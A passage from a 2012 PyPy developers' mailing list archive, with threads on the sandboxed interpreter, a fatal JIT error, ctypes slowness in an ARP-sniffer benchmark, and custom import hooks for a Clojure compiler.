[platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_21.c -o /home/kracekumar/opt/usession-master-0/platcheck_21.o
[platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_21.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_21
[platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_22.c -o /home/kracekumar/opt/usession-master-0/platcheck_22.o
[platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_22.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_22
[platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_23.c -o /home/kracekumar/opt/usession-master-0/platcheck_23.o
[platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_23.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_23
[platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_24.c -o /home/kracekumar/opt/usession-master-0/platcheck_24.o
[platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_24.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_24

I am using pypy 1.7 and tried with pypy 1.8 too; no progress and the same error.

-- 
Thanks & Regards

"Talk is cheap, show me the code" -- Linus Torvalds
kracekumar
www.kracekumar.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From kracethekingmaker at gmail.com  Sun Feb 12 01:59:31 2012
From: kracethekingmaker at gmail.com (kracekumar ramaraju)
Date: Sun, 12 Feb 2012 06:29:31 +0530
Subject: [pypy-dev] Unable to get pypy sandbix running
Message-ID:

Hi

I am on ubuntu 11.10 on a 32 bit OS. I ran all the procedures to get the sandbox env.

Now I am unable to run the sandboxed interpreter.

kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls
autopath.py   __init__.py   interact.py       rsandbox.py   sandlib.py   script.py  vfs.py   virtualtmp
autopath.pyc  __init__.pyc  pypy_interact.py  rsandbox.pyc  sandlib.pyc  test       vfs.pyc
kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls virtualtmp/
script.py
kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ./pypy_interact.py --tmp=virtualtmp pypy-c /tmp/script.py
['/bin/pypy-c', '/tmp/script.py']
Traceback (most recent call last):
  File "./pypy_interact.py", line 121, in
    tmpdir=tmpdir, debug=debug)
  File "./pypy_interact.py", line 44, in __init__
    executable=executable)
  File "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py", line 423, in __init__
    super(VirtualizedSandboxedProc, self).__init__(*args, **kwds)
  File "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py", line 147, in __init__
    env={})
  File "/usr/lib/python2.7/subprocess.py", line 679, in __init__
    errread, errwrite)
  File "/usr/lib/python2.7/subprocess.py", line 1239, in _execute_child
    raise child_exception
OSError: [Errno 2] No such file or directory

Inside sandlib, at line 146, I added print args. Am I missing something?

-- 
Thanks & Regards

"Talk is cheap, show me the code" -- Linus Torvalds
kracekumar
www.kracekumar.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From blendmaster1024 at gmail.com  Sun Feb 12 02:02:03 2012
From: blendmaster1024 at gmail.com (lahwran)
Date: Sat, 11 Feb 2012 18:02:03 -0700
Subject: [pypy-dev] Unable to get pypy sandbix running
In-Reply-To:
References:
Message-ID:

you need to point to the actual file location of pypy-c, such as ../goal/pypy-c.

On Sat, Feb 11, 2012 at 5:59 PM, kracekumar ramaraju wrote:
>
> Hi
>
> I am on ubuntu 11.10 on 32 bit OS. I ran all the procedures to get sanbox
> env.
>
> Now I am unable to run sandboxed interpreter.
>
> kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls
> autopath.py   __init__.py   interact.py       rsandbox.py   sandlib.py
> script.py  vfs.py   virtualtmp
> autopath.pyc  __init__.pyc  pypy_interact.py  rsandbox.pyc  sandlib.pyc
>  test       vfs.pyc
> kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls
> virtualtmp/
> script.py
> kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$
> ./pypy_interact.py --tmp=virtualtmp pypy-c /tmp/script.py
> ['/bin/pypy-c', '/tmp/script.py']
> Traceback (most recent call last):
>   File "./pypy_interact.py", line 121, in
>     tmpdir=tmpdir, debug=debug)
>   File "./pypy_interact.py", line 44, in __init__
>     executable=executable)
>   File
> "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py",
> line 423, in __init__
>     super(VirtualizedSandboxedProc, self).__init__(*args, **kwds)
>   File
> "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py",
> line 147, in __init__
>     env={})
>   File "/usr/lib/python2.7/subprocess.py", line 679, in __init__
>     errread, errwrite)
>   File "/usr/lib/python2.7/subprocess.py", line 1239, in _execute_child
>     raise child_exception
> OSError: [Errno 2] No such file or directory
>
> Inside sandlib at line no 146, added print args. am i missing some thing ?
> --
> Thanks & Regards
>
> "Talk is cheap, show me the code" -- Linus Torvalds
> kracekumar
> www.kracekumar.com
>
>
> _______________________________________________
> pypy-dev mailing list
> pypy-dev at python.org
> http://mail.python.org/mailman/listinfo/pypy-dev
>

From kracethekingmaker at gmail.com  Mon Feb 13 04:41:24 2012
From: kracethekingmaker at gmail.com (kracekumar ramaraju)
Date: Mon, 13 Feb 2012 09:11:24 +0530
Subject: [pypy-dev] How to add 3rd part libraries to sanboxed environment
Message-ID:

Hi

I am running the sandboxed pypy-1.8. I created a file named `name.py` in the current working directory and imported `name.py`; as expected it fails, since the sandboxed environment runs on its own file system.

sys.path yields ['', '/bin/lib_pypy/__extensions__', '/bin/lib_pypy', '/bin/lib-python/modified-2.7', '/bin/lib-python/2.7', '/bin/lib-python/modified-2.7/lib-tk', '/bin/lib-python/2.7/lib-tk', '/bin/lib-python/2.7/plat-linux2'], and os.getcwd() yields /tmp. So how can I install third-party packages in the environment? Classic package installation will fail, if I am not wrong. How to proceed further?

-- 
Thanks & Regards

"Talk is cheap, show me the code" -- Linus Torvalds
kracekumar
www.kracekumar.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From arigo at tunes.org  Mon Feb 13 10:29:15 2012
From: arigo at tunes.org (Armin Rigo)
Date: Mon, 13 Feb 2012 10:29:15 +0100
Subject: [pypy-dev] How to add 3rd part libraries to sanboxed environment
In-Reply-To:
References:
Message-ID:

Hi,

On Mon, Feb 13, 2012 at 04:41, kracekumar ramaraju wrote:
> os.getcwd() yields /tmp, so how can I install third party packages in the
> environment, Class package installation will fail I am not wrong.

You are on your own in this custom environment. Just put the package you want to install inside the directory that will become '/tmp'. (That's not really /tmp, but instead the directory you specify with --tmp=DIR.)

A bientôt,

Armin.
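To make the suggestion above concrete, here is a minimal sketch. The package name `mypkg` and the `virtualtmp` directory are made up for illustration; the idea is simply that whatever you place in the directory passed to `--tmp=DIR` appears as `/tmp` inside the sandbox:

```shell
# Hypothetical layout: expose a pure-Python package to the sandboxed
# interpreter by placing it in the directory that becomes /tmp.
mkdir -p virtualtmp/mypkg
printf 'x = 42\n' > virtualtmp/mypkg/__init__.py

# The sandboxed process would then be started with (paths assumed):
#   ./pypy_interact.py --tmp=virtualtmp pypy-c /tmp/script.py
# and, inside the sandbox, script.py could do:
#   import sys; sys.path.insert(0, '/tmp'); import mypkg
ls virtualtmp/mypkg
```

Only pure-Python packages can be exposed this way; anything that needs a C extension or a real installer will not work in the sandbox.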
From frans.dejong48 at gmail.com  Mon Feb 13 10:19:28 2012
From: frans.dejong48 at gmail.com (Frans)
Date: Mon, 13 Feb 2012 10:19:28 +0100
Subject: [pypy-dev] error
Message-ID:

Hi,
After an error report and a successful slicing and print yesterday, there is another error report.
I am curious about the fix.

-- 
Kind regards,

Frans
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Fatal RPython error.odt
Type: application/vnd.oasis.opendocument.text
Size: 248142 bytes
Desc: not available
URL: 

From fijall at gmail.com  Mon Feb 13 10:42:32 2012
From: fijall at gmail.com (Maciej Fijalkowski)
Date: Mon, 13 Feb 2012 11:42:32 +0200
Subject: [pypy-dev] error
In-Reply-To:
References:
Message-ID:

On Mon, Feb 13, 2012 at 11:19 AM, Frans wrote:
> Hi,
> After an error report and a succesfull slicing and print yesterday there is
> another eerror report.
> I am curious to the fix.

Hi Frans. Can you tell us how to reproduce the problem?

From amauryfa at gmail.com  Mon Feb 13 10:51:24 2012
From: amauryfa at gmail.com (Amaury Forgeot d'Arc)
Date: Mon, 13 Feb 2012 10:51:24 +0100
Subject: [pypy-dev] error
In-Reply-To:
References:
Message-ID:

2012/2/13 Frans
> Hi,
> After an error report and a succesfull slicing and print yesterday there
> is another eerror report.
> I am curious to the fix.

And for people who cannot open .odt files, the console contains:

Skeinforge settings have been saved.
You do not have Tkinter, which is needed for the graphical interface. You will only be able to use the command line.
Information on how to download Tkinter is at:
www.tcl.tk/software/tcltk/
File E:/ProgramData/FABlab/Ultimaker/STL-files/hot end revisie/Base_and_Riser_2.stl is being chain exported.
Preface procedure took 19 seconds.
Inset procedure took 21 seconds.
Fill procedure took 40 seconds.
Multiply procedure took 4 seconds.
Speed procedure took 2 seconds.
Temperature procedure took 1 second.

RPython traceback:
  File "jit_metainterp_optimizeopt_optimizer.c", line 8718, in get_constant_box__pypy_jit_metainterp_optimizeop
  File "jit_metainterp_optimizeopt_unroll.c", line 25888, in UnrollableOptimizer_ensure_imported
  File "jit_metainterp_optimizeopt_optimizer.c", line 10079, in OptValue_import_from
Fatal RPython error: AssertionError

This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.

-- 
Amaury Forgeot d'Arc
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From arigo at tunes.org  Mon Feb 13 11:17:34 2012
From: arigo at tunes.org (Armin Rigo)
Date: Mon, 13 Feb 2012 11:17:34 +0100
Subject: [pypy-dev] error
In-Reply-To:
References:
Message-ID:

Hi Frans,

Thank you, but we need to know at least:

- the version of PyPy (is it the official PyPy 1.8?);
- the program that is started (and how to install it, if complicated);
- and for reference, the OS --- I guess Windows from the dump of Amaury.

Also, I don't find yesterday's conversation with you. Can you explain where it was (nickname if on IRC, etc.)?

A bientôt,

Armin.

From sebastien.volle at gmail.com  Mon Feb 13 13:33:04 2012
From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=)
Date: Mon, 13 Feb 2012 13:33:04 +0100
Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5
Message-ID:

Hi all,

My team is working on a project of fast packet sniffers and I'm comparing performance between different languages. So, we came up with a simple ARP sniffer that I ported to Python using ctypes.

During my investigations, it turned out that using ctypes, PyPy 1.8 is 4x slower than CPython 2.6.5.
I'm pretty new to ctypes and pypy so I'm not sure I understand what's going. My program seems to spend a lot of time in ctypes/function.py:_convert_args though, has the following profile trace demonstrates: $ pypy -m cProfile -s time arp.py Packet buffer now at 0x9CCECB2 Capture started elapsed time : 3983.84ms Total packets : 35571 packets/s : 8928.81 7839198 function calls (7838340 primitive calls) in 4.105 seconds Ordered by: internal time ncalls tottime percall cumtime percall filename:lineno(function) 69876 0.546 0.000 1.584 0.000 function.py:480(_convert_args) 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) 1052195 0.206 0.000 0.206 0.000 {isinstance} 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' objects} 175326 0.187 0.000 0.407 0.000 function.py:350(_call_funcptr) 1 0.173 0.173 4.105 4.105 arp.py:1() 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of 'Array' objects} 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of 'StructureInstance' objects} 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) 71142 0.076 0.000 0.320 0.000 structure.py:174(from_address) 105450 0.075 0.000 0.145 0.000 function.py:593(_build_result) 139755 0.072 0.000 0.120 0.000 primitive.py:64(generic_xxx_p_from_param) 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) 209828 0.062 0.000 0.062 0.000 {method 'get' of 'dict' objects} 107986 0.055 0.000 0.055 0.000 {method '__new__' of '_ctypes.primitive.SimpleType' objects} 71142 0.052 0.000 0.372 0.000 pointer.py:77(getcontents) 35578 0.052 0.000 0.125 0.000 pointer.py:62(__init__) 35576 0.050 
   0.000    0.062    0.000 pointer.py:83(setcontents)
106713     0.047    0.000    0.047    0.000 {method '__new__' of '_ctypes.array.ArrayMeta' objects}
139750     0.043    0.000    0.181    0.000 primitive.py:84(from_param_void_p)
209625     0.043    0.000    0.691    0.000 basics.py:50(get_ffi_param)
283592/283435  0.041  0.000  0.041    0.000 {len}
71144      0.040    0.000    0.040    0.000 {method '__new__' of '_ctypes.structure.StructOrUnionMeta' objects}
105450     0.039    0.000    0.039    0.000 {method 'free_temp_buffers' of '_ffi.FuncPtr' objects}
176683     0.037    0.000    0.037    0.000 {hasattr}
35571      0.037    0.000    0.423    0.000 pcap.py:89(next)

Anyway, I attached my full project to this mail, including a sample pcap capture file. It requires libpcap to be installed on your system. Run arp.py to run the sniffer on the included demo.pcap capture file.

I realize I should try and narrow down the issue some more, but I can't really afford to spend too much time on this right now, so hopefully this will be at least a bit helpful.

Thanks!

Regards,
Sébastien
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: ctypes-test.tar.bz2
Type: application/x-bzip2
Size: 242538 bytes
Desc: not available
URL: 

From sebastien.volle at gmail.com  Mon Feb 13 13:41:55 2012
From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=)
Date: Mon, 13 Feb 2012 13:41:55 +0100
Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5
In-Reply-To:
References:
Message-ID:

I'm running this on Ubuntu Lucid Lynx 32 bits by the way.

Regards,
Sébastien

2012/2/13 Sébastien Volle
> Hi all,
>
> My team is working on a project of fast packet sniffers and I'm comparing
> performance between different languages.
> So, we came up with a simple ARP sniffer that I ported to Python using
> ctypes.
>
> During my investigations, I turned out that using ctypes, PyPy 1.8 is
> 4x slower than CPython 2.6.5.
> After looking at the PyPy buglist, it's seems there are couple open issues > about ctypes so I figured I would ask you guys first before filing a new > bug. > > I'm pretty new to ctypes and pypy so I'm not sure I understand what's > going. My program seems to spend a lot of time in > ctypes/function.py:_convert_args though, has the following profile trace > demonstrates: > > $ pypy -m cProfile -s time arp.py > Packet buffer now at 0x9CCECB2 > Capture started > elapsed time : 3983.84ms > Total packets : 35571 > packets/s : 8928.81 > > 7839198 function calls (7838340 primitive calls) in 4.105 seconds > > Ordered by: internal time > > ncalls tottime percall cumtime percall filename:lineno(function) > 69876 0.546 0.000 1.584 0.000 > function.py:480(_convert_args) > 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) > 1052195 0.206 0.000 0.206 0.000 {isinstance} > 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' > objects} > 175326 0.187 0.000 0.407 0.000 > function.py:350(_call_funcptr) > 1 0.173 0.173 4.105 4.105 arp.py:1() > 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) > 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) > 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) > 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) > 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) > 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) > 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of > 'Array' objects} > 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) > 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of > 'StructureInstance' objects} > 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) > 71142 0.076 0.000 0.320 0.000 > structure.py:174(from_address) > 105450 0.075 0.000 0.145 0.000 > function.py:593(_build_result) > 139755 0.072 0.000 0.120 0.000 > primitive.py:64(generic_xxx_p_from_param) > 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) > 209828 0.062 0.000 0.062 
0.000 {method 'get' of 'dict' objects}
> 107986     0.055    0.000    0.055    0.000 {method '__new__' of '_ctypes.primitive.SimpleType' objects}
> 71142      0.052    0.000    0.372    0.000 pointer.py:77(getcontents)
> 35578      0.052    0.000    0.125    0.000 pointer.py:62(__init__)
> 35576      0.050    0.000    0.062    0.000 pointer.py:83(setcontents)
> 106713     0.047    0.000    0.047    0.000 {method '__new__' of '_ctypes.array.ArrayMeta' objects}
> 139750     0.043    0.000    0.181    0.000 primitive.py:84(from_param_void_p)
> 209625     0.043    0.000    0.691    0.000 basics.py:50(get_ffi_param)
> 283592/283435  0.041  0.000  0.041    0.000 {len}
> 71144      0.040    0.000    0.040    0.000 {method '__new__' of '_ctypes.structure.StructOrUnionMeta' objects}
> 105450     0.039    0.000    0.039    0.000 {method 'free_temp_buffers' of '_ffi.FuncPtr' objects}
> 176683     0.037    0.000    0.037    0.000 {hasattr}
> 35571      0.037    0.000    0.423    0.000 pcap.py:89(next)
>
>
> Anyway, I attached my full project to this mail, including a sample pcap
> capture file. It requires libpcap to be installed on your system. Run
> arp.py to run the sniffer on the included demo.pcap capture file.
> I realize I should try and narrow down the issue some more, but I can't
> really afford to spend too much time on this right now so hopefully, this
> will be a least a bit helpful.
>
> Thanks!
>
> Regards,
> Sébastien
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From anto.cuni at gmail.com  Mon Feb 13 14:13:02 2012
From: anto.cuni at gmail.com (Antonio Cuni)
Date: Mon, 13 Feb 2012 14:13:02 +0100
Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5
In-Reply-To:
References:
Message-ID: <4F390C5E.4060802@gmail.com>

Hello Sébastien,

On 02/13/2012 01:33 PM, Sébastien Volle wrote:
> During my investigations, I turned out that using ctypes, PyPy 1.8 is
> 4x slower than CPython 2.6.5.
> After looking at the PyPy buglist, it's seems there are couple open issues
> about ctypes so I figured I would ask you guys first before filing a new
> bug.
> I'm pretty new to ctypes and pypy so I'm not sure I understand what's
> going.
> My program seems to spend a lot of time in ctypes/function.py:_convert_args
> though, has the following profile trace demonstrates:

this is indeed a problem (or, better, a missing feature) in pypy's ctypes implementation.

PyPy can make ctypes calls fast only in a set of "supported cases": in that case, ctypes calls take a fast path which is actually very fast, while in all the others it takes a slow path which is actually very slow :-/.

I looked at your code and I realized that there is one common case in which we fail to take the fast path, and this happens when we pass a ctypes array to a function which expects a pointer. This means that in your code all the calls to c.memcmp are slow.

This is something that we should really fix. In the meantime, you can work around the issue by manually casting the array to a c_void_p before calling the function; e.g.::

    xx = cast(offset_eth.dst, c_void_p)
    yy = cast(eth_brd, c_void_p)
    if c.memcmp(xx, yy, 6) != 0:

In addition, I should point out that both in pypy and cpython the code executed inside functions is much faster than the code executed at module level: so, I put most of the code in arp.py inside a function called main(), which is then called and timed.

You can find my quickly hacked arp.py attached here. With my changes, it now takes 0.13ms vs 440.5ms on CPython, and 0.77ms vs 1092.71ms on PyPy.

On this particular test CPython is still faster than PyPy, however it might simply be that the JIT doesn't have enough time to warm up. Could you please try it on a larger cap file so that it runs at least for e.g. 5 seconds?

ciao,
Anto
-------------- next part --------------
A non-text attachment was scrubbed...
Name: arp.py
Type: text/x-python
Size: 5444 bytes
Desc: not available
URL: 

From tbaldridge at gmail.com  Mon Feb 13 15:18:13 2012
From: tbaldridge at gmail.com (Timothy Baldridge)
Date: Mon, 13 Feb 2012 08:18:13 -0600
Subject: [pypy-dev] replacing/modifying __import__
Message-ID:

I'm in the process of writing a Clojure->Python bytecode compiler (http://github.com/halgari/clojure-py). The project is going quite well and runs great on PyPy and CPython. However, there is one feature I'm not quite sure how to implement in PyPy. What I would like is to extend 'import' so that it can handle .clj files:

import clojure.core   # where there is a file called clojure/core.clj

Now in CPython I can simply overwrite __builtins__.__import__ with a new function that adds additional functionality to __import__. However, in PyPy we can't change __builtins__. So is there a better option? The interop between clojure and python is so good already that I'd hate to make users run:

import clojure
clojure.import("core.clj")

Any ideas?

Thanks,

Timothy

-- 
"One of the main causes of the fall of the Roman Empire was that -- lacking zero -- they had no way to indicate successful termination of their C programs." (Robert Firth)

From sebastien.volle at gmail.com  Mon Feb 13 15:22:08 2012
From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=)
Date: Mon, 13 Feb 2012 15:22:08 +0100
Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5
In-Reply-To: <4F390C5E.4060802@gmail.com>
References: <4F390C5E.4060802@gmail.com>
Message-ID:

Thank you for your help Antonio.

It seems a little indentation problem in the modified arp.py file you attached makes the main() loop return after a single packet. I attached the updated version.

The actual new figures are:
CPython: ~580ms (~310ms with initial version)
PyPy: ~1120ms (~1300ms with initial version)

So, the manual cast of array to c_void_p makes the program around 2x slower on CPython, and only marginally faster on PyPy.
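For readers following along, the cast-before-call pattern being measured here can be tried in isolation. This is a minimal self-contained sketch against libc's memcmp; the buffer contents are made up for illustration, and loading libc via `CDLL(None)` assumes a POSIX system:

```python
import ctypes
from ctypes import c_void_p, c_size_t, c_int, cast, create_string_buffer

# On POSIX, CDLL(None) gives access to the symbols already loaded into
# the process, which includes libc's memcmp.
libc = ctypes.CDLL(None)
libc.memcmp.argtypes = [c_void_p, c_void_p, c_size_t]
libc.memcmp.restype = c_int

# Two 6-byte buffers standing in for Ethernet addresses (made-up values).
eth_brd = create_string_buffer(b"\xff\xff\xff\xff\xff\xff", 6)
dst = create_string_buffer(b"\xff\xff\xff\xff\xff\xff", 6)

# Passing the arrays directly also works, but casting to c_void_p first
# is the workaround discussed in this thread for PyPy's ctypes fast path.
result = libc.memcmp(cast(dst, c_void_p), cast(eth_brd, c_void_p), 6)
print(result)  # 0 means the two buffers compare equal
```

Whether the cast actually helps depends on the interpreter version, as the figures in this thread show; the sketch only demonstrates that the two call styles are interchangeable in behavior.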
PyPy now spends most of its time in pointer.py:_cast_addr().

I might try with a bigger pcap file and try to investigate a bit on my own when I get the occasion.

On a related note, I wish I could just use the pcapy module for this particular project, which is actually way faster than ctypes wrappers, at least with CPython, but it doesn't build for pypy (missing things in sysconfig, I believe).

Thank you for your time.

Regards,
Sébastien

2012/2/13 Antonio Cuni
> Hello Sébastien,
>
> On 02/13/2012 01:33 PM, Sébastien Volle wrote:
>
> During my investigations, I turned out that using ctypes, PyPy 1.8 is
>> 4x slower than CPython 2.6.5.
>> After looking at the PyPy buglist, it's seems there are couple open issues
>> about ctypes so I figured I would ask you guys first before filing a new
>> bug.
>>
>> I'm pretty new to ctypes and pypy so I'm not sure I understand what's
>> going.
>> My program seems to spend a lot of time in ctypes/function.py:_convert_args
>> though, has the following profile trace demonstrates:
>
> this is indeed a problem (or, better, a missing feature) in pypy's ctypes
> implementation.
>
> PyPy can make ctypes calls fast only in a set of "supported cases": in
> that case, ctypes calls take a fast path which is actually very fast, while
> in all the others it takes a slow path which is actually very slow :-/.
>
> I looked at your code and I realized that there is one common case in
> which we fail to take the fast path, and this happens when we pass a ctypes
> array to a function which expects a pointer. This means that in your code
> all the calls to c.memcmp are slow.
>
> This is something that we should really fix.
> In the meantime, you can work
> around the issue by manually casting the array to a c_void_p before calling
> the function; e.g.::
>
>     xx = cast(offset_eth.dst, c_void_p)
>     yy = cast(eth_brd, c_void_p)
>     if c.memcmp(xx, yy, 6) != 0:
>
> In addition, I should point out that both in pypy and cpython the code
> executed inside functions is much faster than the code executed at module
> level: so, I put most of the code in arp.py inside a function called
> main(), which is then called and timed.
>
> You can find my quickly hacked arp.py attached here. With my changes, it
> now takes 0.13ms vs 440.5ms on CPython, and 0.77ms vs 1092.71ms on PyPy.
>
> On this particular test CPython is still faster than PyPy, however it
> might simply be that the JIT doesn't have enough time to warmup. Could you
> please try it on a larger cap file so that it runs at least for e.g. 5
> seconds?
>
> ciao,
> Anto
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: arp.py
Type: application/octet-stream
Size: 5622 bytes
Desc: not available
URL: 

From stefan_ml at behnel.de  Mon Feb 13 15:29:07 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Mon, 13 Feb 2012 15:29:07 +0100
Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5
In-Reply-To:
References:
Message-ID:

Sébastien Volle, 13.02.2012 13:33:
> My team is working on a project of fast packet sniffers and I'm comparing
> performance between different languages.
> So, we came up with a simple ARP sniffer that I ported to Python using
> ctypes.

If performance is important to you, you may want to write the wrapper for Python in Cython instead (and maybe also parts of the filtering code, which I assume your program to be about).
Stefan

From amauryfa at gmail.com  Mon Feb 13 15:42:30 2012
From: amauryfa at gmail.com (Amaury Forgeot d'Arc)
Date: Mon, 13 Feb 2012 15:42:30 +0100
Subject: [pypy-dev] replacing/modifying __import__
In-Reply-To:
References:
Message-ID:

2012/2/13 Timothy Baldridge
> I'm in the process of writing a Clojure->Python bytecode compiler
> (http://github.com/halgari/clojure-py). The project is going quite
> well and runs great on PyPy and CPython. However there is one feature
> I'm not quite sure how to implement in PyPy. What I would like, is to
> extend 'import' so that it can handle .clj files:
>
> import clojure.core # where there is a file called clojure/core.clj
>
> Now in CPython I can simply ovewrite __builtins__.__import__ with a
> new function that adds additional functionality to __import__.
> However, in PyPy we can't change __builtins__. So is there a better
> option? The interop between clojure and python is so good already,
> that I'd hate to make users run:
>
> import clojure
> clojure.import("core.clj")
>
> Any ideas?

Have you tried with an import hook?

sys.path_hooks is a list of callables that are tried in turn to handle a sys.path item. For example, the zipimporter is already implemented as a path_hook; it catches sys.path entries that end with ".zip". You could design a clojureimporter that would handle any entry in sys.path which ends with "/clojure" (or better, which has an __init__.clj file).

There is also sys.meta_path, which can be used for further customization, and may be needed if you want to have both .py and .clj files in the same directory.

Both kinds of hooks are normally supported by both CPython and PyPy...

-- 
Amaury Forgeot d'Arc
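To illustrate the second kind of hook mentioned above, here is a minimal sketch of a `sys.meta_path` finder/loader. It uses the modern `importlib` API (Python 3) rather than the 2.7-era `find_module`/`load_module` protocol, and the module name `demo_clj` and its contents are invented for the example:

```python
import sys
import importlib.abc
import importlib.util


class CljFinder(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """Pretend the module 'demo_clj' is backed by a .clj source file."""

    def find_spec(self, fullname, path, target=None):
        if fullname == "demo_clj":
            # Claim this import; a real importer would search sys.path
            # for a .clj file instead of matching a hard-coded name.
            return importlib.util.spec_from_loader(fullname, self)
        return None  # let the normal machinery handle everything else

    def create_module(self, spec):
        return None  # use the default module object

    def exec_module(self, module):
        # Stand-in for "compile the .clj file into this module's namespace".
        module.answer = 42


sys.meta_path.insert(0, CljFinder())

import demo_clj  # resolved by CljFinder, not by the filesystem
print(demo_clj.answer)  # prints 42
```

A path-hook-based importer works the same way in spirit, but is keyed off entries in `sys.path` rather than consulted on every import.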
From arigo at tunes.org  Mon Feb 13 15:50:45 2012
From: arigo at tunes.org (Armin Rigo)
Date: Mon, 13 Feb 2012 15:50:45 +0100
Subject: [pypy-dev] replacing/modifying __import__
In-Reply-To:
References:
Message-ID:

Hi Timothy,

On Mon, Feb 13, 2012 at 15:18, Timothy Baldridge wrote:
> Now in CPython I can simply ovewrite __builtins__.__import__ with a
> new function that adds additional functionality to __import__.
> However, in PyPy we can't change __builtins__.

Why not? You're probably just confused about __builtin__ versus __builtins__. Don't use the latter, even in CPython, because it only works half of the time. It is documented as an internal detail. Always do "import __builtin__" instead.

A bientôt,

Armin.

From kracethekingmaker at gmail.com  Mon Feb 13 18:38:31 2012
From: kracethekingmaker at gmail.com (kracekumar ramaraju)
Date: Mon, 13 Feb 2012 23:08:31 +0530
Subject: [pypy-dev] Socket module fails in pypy1.8
Message-ID:

Hi

kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ pypy1.7 pypy_interact.py --tmp=virtualtmp/ ../../../pypy-c
['/bin/pypy-c']
Warning: cannot find your CPU L2 cache size in /proc/cpuinfo
Not Implemented: SomeString(no_nul=True)
RuntimeError
'import site' failed
Python 2.7.2 (2346207d99463f299f09f3e151c9d5fa9158f71b, Feb 11 2012, 23:26:49)
[PyPy 1.8.0 with GCC 4.6.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
And now for something completely different: ``PyPy is not a real VM: no segfault handlers to do the rare cases''
>>>> import socket
Traceback (most recent call last):
  File "", line 1, in
  File "/bin/lib-python/modified-2.7/socket.py", line 47, in
    import _socket
ImportError: No module named _socket
>>>>

It seems the _socket module is undefined. I checked in lib-python/modified-2.7 and could not locate the _socket module.
-- 
Thanks & Regards

"Talk is cheap, show me the code" -- Linus Torvalds
kracekumar
www.kracekumar.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From fijall at gmail.com  Mon Feb 13 19:44:07 2012
